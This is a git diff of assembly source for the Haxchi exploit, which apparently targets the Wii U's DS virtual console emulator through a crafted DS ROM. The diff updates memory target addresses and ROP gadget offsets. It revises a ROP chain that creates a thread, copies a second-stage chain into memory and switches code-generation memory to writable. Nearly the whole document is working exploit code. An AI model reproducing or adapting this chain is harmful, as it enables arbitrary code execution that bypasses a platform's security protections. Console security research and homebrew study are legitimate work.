diff --git a/haxchi.s b/haxchi.s index 8555127..8987021 100644 --- a/haxchi.s +++ b/haxchi.s @@ -1,7 +1,7 @@ .create "haxchi.srl", 0 .nds -hax_target_address equ 0x107968AC +hax_target_address equ 0x1076FAA4 code_target_address equ (0xF4000000 + 0xFD2000) .org 0x000 @@ -15,11 +15,11 @@ code_target_address equ (0xF4000000 + 0xFD2000) .org 0x020 .word arm9_data ; ARM9 rom_offset .word 0x20000000 ; ARM9 entry_address - .word 0xEBBC0E00 + code_target_address ; ARM9 ram_address + .word 0xEBDDFC00 + code_target_address ; ARM9 ram_address .word arm9_data_end - arm9_data ; ARM9 size .word arm7_data ; ARM7 rom_offset .word 0x2000000 ; ARM7 entry_address - .word 0xEBBC0E00 + hax_target_address ; ARM7 ram_address + .word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address .word arm7_data_end - arm7_data ; ARM7 size .org 0x080 diff --git a/haxchi_rop.s b/haxchi_rop.s index b277cb4..9b1d316 100644 --- a/haxchi_rop.s +++ b/haxchi_rop.s @@ -1,23 +1,23 @@ MAIN_STACKTOP equ (0x30796C00) -CORE0_STACKORIG equ (0x2B566050) ; TEMP ? -CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ? +CORE0_STACKORIG equ (0x2B267B50) ; TEMP ? +CORE0_ROPSTART equ (CORE0_STACKORIG + 0xAFC) ; TEMP ? RPX_OFFSET equ (0x01800000) COREINIT_OFFSET equ (- 0xFE3C00) -LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084) -MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8) -BCTRL equ (RPX_OFFSET + 0x02206FBC) -MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610) -LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8) -LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0) -LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38) -MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168) -LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44) +LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C) +MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90) +BCTRL equ (RPX_OFFSET + 0x02208EA4) +MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500) +LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108) +LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C) +LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC) +MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0) +LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8) MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968) -NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8) -NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04) -HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8) -HACHI_APPLICATION_PTR equ (0x10c8c938) +NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40) +NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C) +HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774) +;HACHI_APPLICATION_PTR equ (0x10A6E038) ;probably wrong OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET) OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET) @@ -27,15 +27,15 @@ OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET) MEMCPY equ (0x02019BC8 + COREINIT_OFFSET) DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET) IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET) -SYS_LAUNCHSETTINGS equ (0x03B9B25C) -_EXIT equ (0x0229a240 + RPX_OFFSET) -exit equ (0x022924b0 + RPX_OFFSET) +;SYS_LAUNCHSETTINGS equ (0x03B9B25C) +;_EXIT equ (0x0229a240 + RPX_OFFSET) +;exit equ (0x022924b0 + RPX_OFFSET) OSFATAL equ (0x02015218 + COREINIT_OFFSET) CODEGEN_ADR equ 0x01800000 -NERD_THREADOBJECT equ (0x107968AC - 0x1000) +NERD_THREADOBJECT equ (0x1076FAA4 - 0x1000) .macro set_sp,v .word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR @@ -134,7 +134,7 @@ NERD_THREADOBJECT equ (0x107968AC - 0x1000) -.create "haxchi_rop_hook.bin", 0x107968AC +.create "haxchi_rop_hook.bin", 0x1076FAA4 .arm.big rop_hook_start: @@ -150,10 +150,9 @@ rop_hook_start: .arm.big rop_start: - - ; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 - - ; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0 + ;call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0 + ;call_func OSFATAL, 0x1007E7A8, 0, 0, 0 + ;call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0 ; call_func exit, 0, 0, 0, 0 ; call_func _EXIT, 0, 0, 0, 0 ; .word _EXIT @@ -163,13 +162,15 @@ rop_start: ; .word 0xDEADBABE ; garbage ; .word 0xDEADBABE ; garbage ; .word 0xDEADBABE ; garbage - call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0 + call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread_param, 0x0, 0x0 call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0 call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0 call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0 + ;call_func DC_FLUSHRANGE, 0x1076EAA4, 0x1000, 0x0, 0x0 call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop core0rop: + ; .word OSFATAL ; switch codegen to RW call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0